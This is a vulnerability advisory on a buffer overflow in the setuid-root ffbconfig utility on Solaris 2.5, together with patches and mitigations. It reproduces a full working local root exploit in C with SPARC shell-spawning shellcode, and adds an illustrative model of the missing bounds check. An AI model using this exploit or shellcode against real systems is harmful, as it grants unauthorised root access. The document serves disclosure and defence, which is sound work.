COMMAND

    /usr/sbin/ffbconfig

SYSTEMS AFFECTED

    Solaris 2.5 and 2.5.1 (SunOS 5.5 and 5.5.1) with the Fast Frame Buffer
    (FFB) Graphics Accelerator card installed.

PROBLEM

    ffbconfig configures the Fast Frame Buffer (FFB) Graphics Accelerator
    and is part of the FFB Configuration Software package, SUNWffbcf.  The
    program is only of use if the FFB card is installed; the presence  of
    the device /dev/fbs/ffb0 is a sign that it is.  The setuid binary  is
    installed with the package, however, whether or not the card is there,
    so "pkginfo SUNWffbcf" is the reliable test for exposure.

    Due to insufficient bounds checking on arguments supplied by users, it
    is possible to overwrite the stack of the ffbconfig program while  it
    is executing, including a saved return  address.  By supplying a
    carefully designed argument to ffbconfig, intruders may be able to
    force it to execute arbitrary commands.  As ffbconfig is setuid root,
    this may allow any local user to run arbitrary commands with root
    privileges.

    Cristian SCHIPOR <skipo@SUNDY.CS.PUB.RO> has found a buffer  overflow
    hole in ffbconfig (Solaris 2.X) that allows a local user to gain root
    access on the machine.  He used an exploit written by Jeremy Elson for
    the gethostbyname() buffer overflow hole, modifying some values to make
    it work against ffbconfig.  Here is Cristian's exploit:

/*
 * This works on Solaris 2.5 with /usr/sbin/ffbconfig.
 *
 * Layout of the string passed as the "-dev" argument: BUF_LENGTH bytes of
 * NOP sled followed by the shellcode, then EXTRA bytes filled with copies
 * of the guessed address of the sled (the current stack pointer minus
 * STACK_OFFSET).  Whichever copy lands on ffbconfig's saved return address
 * redirects execution into the sled.  Assumes a 32-bit SPARC build, where
 * u_long and a stack slot are both 4 bytes.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      128
#define EXTRA           256
#define STACK_OFFSET    128
#define SPARC_NOP       0xa61cc013   /* xor %l3,%l3,%l3: harmless, no NUL bytes */

/* execve("/bin/sh") shellcode for 32-bit SPARC; contains no NUL bytes. */
u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

/* Return the caller's stack pointer.  Relies on %i0 being the return
 * value register after "ret; restore", so compile without optimisation. */
u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

int main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA + 1];   /* +1: execl needs a terminated string */
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen((char *) sparc_shellcode);

  (void) argc;
  (void) argv;

  /* NOP sled at the front of the buffer ... */
  long_p = (u_long *) buf;
  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  /* ... followed by the shellcode itself, ending at byte BUF_LENGTH. */
  char_p = (u_char *) long_p;
  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  /* Guess where the sled will sit in ffbconfig's stack and repeat that
   * address so one copy overwrites the saved return address. */
  long_p = (u_long *) char_p;
  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;
  buf[BUF_LENGTH + EXTRA] = '\0';

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
         targ_addr, BUF_LENGTH, EXTRA, STACK_OFFSET);

  execl("/usr/sbin/ffbconfig", "ffbconfig", "-dev", buf, (char *) 0);
  perror("execl failed");
  return 1;
}
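    The following C model is an added illustration, not code from the
    advisory, from Cristian's exploit or from Sun.  ffbconfig is closed
    source, so the model assumes a 64-byte device-name buffer with the saved
    return address four bytes above it, a hypothetical original return
    address 0x10001234 and a hypothetical sled address 0xeffff6d8 (chosen,
    like the real exploit's, to contain no zero bytes).  It shows why an
    unchecked copy of the -dev argument lets the repeated address in the
    exploit above land on the return slot, and what the bounds check that
    ffbconfig lacked looks like.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Model of the frame the advisory describes: one byte array holding
 * DEV_BUF_LEN bytes for the "-dev" string, then a 32-bit slot standing in
 * for the saved return address (a 32-bit SPARC word).  Sizes and addresses
 * are assumptions for illustration, not ffbconfig's real layout.
 */
#define DEV_BUF_LEN   64
#define RET_SLOT      DEV_BUF_LEN
#define FRAME_LEN     (DEV_BUF_LEN + 4)
#define ORIG_RET      0x10001234u   /* hypothetical legitimate return address */
#define SLED_ADDR     0xeffff6d8u   /* hypothetical attacker guess, no zero bytes */
#define ADDR_REPEATS  4

struct frame {
    unsigned char raw[FRAME_LEN];
};

static void frame_init(struct frame *f)
{
    uint32_t ret = ORIG_RET;
    memset(f->raw, 0, FRAME_LEN);
    memcpy(f->raw + RET_SLOT, &ret, sizeof ret);
}

static uint32_t frame_ret(const struct frame *f)
{
    uint32_t ret;
    memcpy(&ret, f->raw + RET_SLOT, sizeof ret);
    return ret;
}

/* Vulnerable form: a strcpy-style copy that trusts the argument's length.
 * It stops at the end of the model frame only so the demonstration stays
 * inside the array; a real strcpy keeps writing up the stack. */
static void copy_dev_unchecked(struct frame *f, const char *arg)
{
    size_t i;
    for (i = 0; i < FRAME_LEN && arg[i] != '\0'; i++)
        f->raw[i] = (unsigned char) arg[i];
    if (i < FRAME_LEN)
        f->raw[i] = '\0';
}

/* Hardened form: refuse the argument unless its terminator lies inside the
 * buffer, and only then copy.  Nothing past DEV_BUF_LEN is ever written. */
static int copy_dev_checked(struct frame *f, const char *arg)
{
    const char *end = memchr(arg, '\0', DEV_BUF_LEN);
    if (end == NULL)
        return -1;                      /* too long for the buffer */
    memcpy(f->raw, arg, (size_t) (end - arg) + 1);
    return 0;
}

/* Constructed sample input shaped like the exploit's argument: filler in
 * place of the NOP sled and shellcode, then the guessed address repeated so
 * one copy lands on the return slot whatever the exact distance is.  The
 * address is stored in host byte order because the model reads it back the
 * same way. */
const char *exploit_style_arg(void)
{
    static char payload[DEV_BUF_LEN + ADDR_REPEATS * 4 + 1];
    uint32_t addr = SLED_ADDR;
    int k;
    memset(payload, 'A', DEV_BUF_LEN);
    for (k = 0; k < ADDR_REPEATS; k++)
        memcpy(payload + DEV_BUF_LEN + 4 * k, &addr, sizeof addr);
    payload[sizeof payload - 1] = '\0';
    return payload;
}

/* Run one copy into a fresh frame and report what the return slot holds. */
uint32_t ret_after_unchecked(const char *arg)
{
    struct frame f;
    frame_init(&f);
    copy_dev_unchecked(&f, arg);
    return frame_ret(&f);
}

int checked_copy_status(const char *arg)
{
    struct frame f;
    frame_init(&f);
    return copy_dev_checked(&f, arg);
}

uint32_t ret_after_checked(const char *arg)
{
    struct frame f;
    frame_init(&f);
    (void) copy_dev_checked(&f, arg);
    return frame_ret(&f);
}

int main(void)
{
    const char *benign = "/dev/fbs/ffb0";
    const char *evil = exploit_style_arg();
    printf("benign, unchecked: ret=0x%08x\n", ret_after_unchecked(benign));
    printf("evil,   unchecked: ret=0x%08x (hijacked)\n", ret_after_unchecked(evil));
    printf("evil,   checked:   rc=%d ret=0x%08x\n",
           checked_copy_status(evil), ret_after_checked(evil));
    return 0;
}
```

    The unchecked copy returns the attacker's address in the return slot
    for the 80-byte argument, while the checked copy refuses it without
    touching the slot and still accepts a normal device path.  Finding the
    terminator inside the buffer before copying is the whole of the check
    ffbconfig needed, and it applies to any setuid program that copies argv
    into fixed-size stack storage.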

SOLUTION

    The vulnerability relating to ffbconfig is fixed by the  following
    patches:

    OS version    Patch ID
    ----------    --------
    SunOS 5.5.1   103796-09
    SunOS 5.5     103076-09

    The above-mentioned  patches are  listed in  the Graphics  section
    under Unbundled Products at:

        ftp://sunsolve1.sun.com/pub/patches/patches.html.

    As an alternative, remove the setuid bit and non-root execute
    permission, so that only root can run the program at all:

        # chmod 500 /usr/sbin/ffbconfig
        # ls -l /usr/sbin/ffbconfig
        -r-x------   1 root  bin   31436 Oct 14 1995 /usr/sbin/ffbconfig

    or remove the SUNWffbcf package:

        # /usr/sbin/pkgrm SUNWffbcf

    There  are  also  a  number  of  other  packages  which  are  also
    associated with the FFB Graphics Accelerator:

        SUNWffb        FFB System Software (Device Driver)
        SUNWffbmn      On-Line FFB Manual Pages
        SUNWffbw       FFB Window System Support
        SUNWffbxg      FFB XGL support

    Although there is nothing  to suggest that these  packages contain
    vulnerabilities, if  you do  not require  their functionality, you
    may also wish to remove them with the /usr/sbin/pkgrm command.

    There is also a report that this exploit yields UID 0 on a system using
    AFS, but that UID 0 there does not amount to root privileges over
    AFS-resident files: AFS access is governed by its own access control
    lists, managed with the 'fs' command, rather than by the UNIX permission
    bits that 'chmod' sets.